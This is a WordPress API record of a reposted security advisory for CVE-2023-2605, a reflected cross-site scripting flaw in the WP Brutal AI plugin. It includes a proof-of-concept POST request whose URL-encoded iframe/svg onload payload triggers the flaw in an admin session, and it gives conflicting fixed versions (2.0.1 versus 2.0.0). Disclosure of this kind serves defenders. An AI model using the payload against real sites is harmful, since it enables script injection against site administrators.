{"id":45594,"date":"2023-07-25T19:10:12","date_gmt":"2023-07-25T15:10:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173734\/wpbrutalai2x-xss.txt"},"modified":"2023-07-28T00:18:08","modified_gmt":"2023-07-27T19:48:08","slug":"wordpress-wp-brutal-ai-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-wp-brutal-ai-cross-site-scripting\/","title":{"rendered":"WordPress WP Brutal AI Cross Site Scripting"},"content":{"rendered":"<p>Tittle:<br \/>\nWordPress Plugin WP Brutal AI &lt; 2.0.1 &#8211; Admin + Reflected XSS<\/p>\n<p>References:<br \/>\nCVE-2023-2605<\/p>\n<p>Author:<br \/>\nTaurus Omar<\/p>\n<p>Description:<br \/>\nThe plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.<\/p>\n<p>Affects Plugins:<br \/>\nWP Brutal AI- Fixed in version 2.0.0<\/p>\n<p>Proof of Concept:<\/p>\n<p>Send an HTTP request with the following:<\/p>\n<p>&#8220;`<br \/>\nPOST https:\/\/example.com\/wp-admin\/admin.php?page=viewwpbrutalaicampaign&amp;id=1 HTTP\/1.1<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 86<br \/>\nCookie: [Admin+]\n<p>search=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&amp;status=<\/p>\n<p>&#8220;`<\/p>\n<p>Classification:<br \/>\nType XSS<br \/>\nOWASP top 10 A7: Cross-Site Scripting (XSS)<br \/>\nCWE-79<\/p>\n<p>wpScan:<br \/>\nhttps:\/\/wpscan.com\/vulnerability\/372cb940-71ba-4d19-b35a-ab15f8c2fdeb<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tittle: WordPress Plugin WP Brutal AI &lt; 2.0.1 &#8211; Admin + Reflected XSS References: CVE-2023-2605 Author: Taurus Omar Description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45594","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45594"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45594\/revisions"}],"predecessor-version":[{"id":45715,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45594\/revisions\/45715"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}